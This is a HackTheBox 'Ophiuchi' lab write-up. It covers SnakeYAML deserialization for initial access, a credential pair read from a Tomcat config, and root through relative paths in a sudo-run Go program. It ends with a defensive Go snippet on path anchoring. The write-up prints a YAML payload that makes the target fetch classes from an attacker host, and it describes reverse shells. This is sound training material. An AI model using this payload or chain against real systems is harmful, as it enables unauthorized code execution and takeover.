Ophiuchi Writeup
Medium Linux box from HackTheBox.
Rustscan shows two open ports:
- port 22
- port 8080
Checking port 8080, we find a web page that accepts YAML input and parses it.
I found an article on exploiting SnakeYAML deserialization: https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
Submitting this makes the target request files from our Python HTTP server. We used this exploit to deliver a reverse shell: https://github.com/artsploit/yaml-payload. With it we get a shell as the tomcat user.
The application runs on Tomcat, so let's look for its configuration.
Reading the Tomcat config file gives us credentials:
admin:whythereisalimit
After logging in over SSH we are the admin user and can read user.txt.
Checking sudo -l,
we find that we can run index.go with sudo without a password.
Looking at index.go, the paths for main.wasm and deploy.sh are not fully specified (they are relative rather than absolute).
Let's create a main.wasm whose info function returns 1,
using https://mbebenita.github.io/WasmExplorer/
In deploy.sh, put a reverse shell. We get a reverse shell as root and can read root.txt.
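As an added illustration (not the box's own index.go, which the writeup does not reproduce), the snippet below contrasts resolving main.wasm relative to the caller's working directory, which is the weakness abused above, with anchoring it to a fixed root-owned directory; the TrustedDir path is a hypothetical placeholder.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// TrustedDir stands in for the root-owned directory a sudo-run program
// should load its helpers from. Hypothetical path, not from the writeup.
const TrustedDir = "/opt/wasm-functions"

// ResolveRelative mirrors the weak pattern: a bare file name is resolved
// against whatever working directory the caller chose, so a user running
// the program via sudo controls which main.wasm and deploy.sh are used.
func ResolveRelative(cwd, name string) string {
	return filepath.Join(cwd, name)
}

// ResolveAnchored is the hardened form: the name is joined onto TrustedDir,
// and absolute names or ".." segments that would escape it are rejected.
func ResolveAnchored(name string) (string, error) {
	if filepath.IsAbs(name) {
		return "", fmt.Errorf("absolute names are not allowed: %q", name)
	}
	full := filepath.Join(TrustedDir, name) // Join also cleans the path
	rel, err := filepath.Rel(TrustedDir, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, "../") {
		return "", fmt.Errorf("%q escapes %s", name, TrustedDir)
	}
	return full, nil
}

func main() {
	cwd, _ := os.Getwd()
	// The relative form follows the caller's cwd; the anchored form does not.
	fmt.Println("relative:", ResolveRelative(cwd, "main.wasm"))
	p, err := ResolveAnchored("main.wasm")
	fmt.Println("anchored:", p, err)
	_, err = ResolveAnchored("../deploy.sh")
	fmt.Println("escape attempt:", err)
}
```

The directory behind TrustedDir must itself be root-owned and not writable by the sudo caller, or the anchoring buys nothing.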